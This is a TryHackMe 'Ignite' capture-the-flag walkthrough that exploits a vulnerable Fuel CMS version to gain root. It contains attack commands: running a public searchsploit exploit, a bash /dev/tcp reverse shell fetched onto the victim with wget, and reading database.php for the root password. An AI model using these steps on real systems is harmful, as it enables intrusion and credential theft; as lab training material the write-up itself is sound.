TryHackMe|Ignite WriteUp\Walkthrough (English)

Ignite

Room Link: https://tryhackme.com/room/ignite

• sudo nmap IP -vv you will notice that you only have port 80 open, even if you scanned all ports.

• In the home page you have multiple important information. One you will get the credentials for the admin in the home page.

And you will get the location of the database file.

• After doing gobuster there is nothing important in the hidden files. In the robots.txt you will find a /fuel/ folder. If you signed in and poke around you will not find much.

• Now in the home page you got the version of the CMS.

searchsploit fuel cms you will get 3 different exploits for the same version. Use 50477 because the other 2 have many problems in the code. searchsploit -m 50477 to copy the exploit to your current directory, then rename it for ease only mv 50477.py fuel.py.

• To run the exploit python3 fuel.py -u http://IP, you will get a prompt to Enter commands, try different commands such as cd, ls and so on. Once you make sure that you can run different commands, use this shell to gain a reverse shell connection from the target. nc -nlvp 9001 this listener will be on your machine. on the target machine you will use this one-line reverse shell bash -i >& /dev/tcp/yourIP/9001 0>&1, if you tried to run it as is it won’t work.

• To make the reverse shell work save it in a file in your device. Then use wget to download it on the victim’s machine. then make sure that it is downloaded successfully by ls. After that, chmod +x shell.sh then run it bash shell.sh.

• You will get a shell back on your machine, cd /home/www-data and you will find the user flag ✨.

• For the root flag, go to the file that we mentioned in step 2. cd /var/www/html/fuel/application/config then cat database.php you will find the password of the root. su root, it may require a terminal session so use python3 -c 'import pty; pty.spawn("/bin/bash")' then provide the password ******, navigate to /root and retrieve the root flag ✨.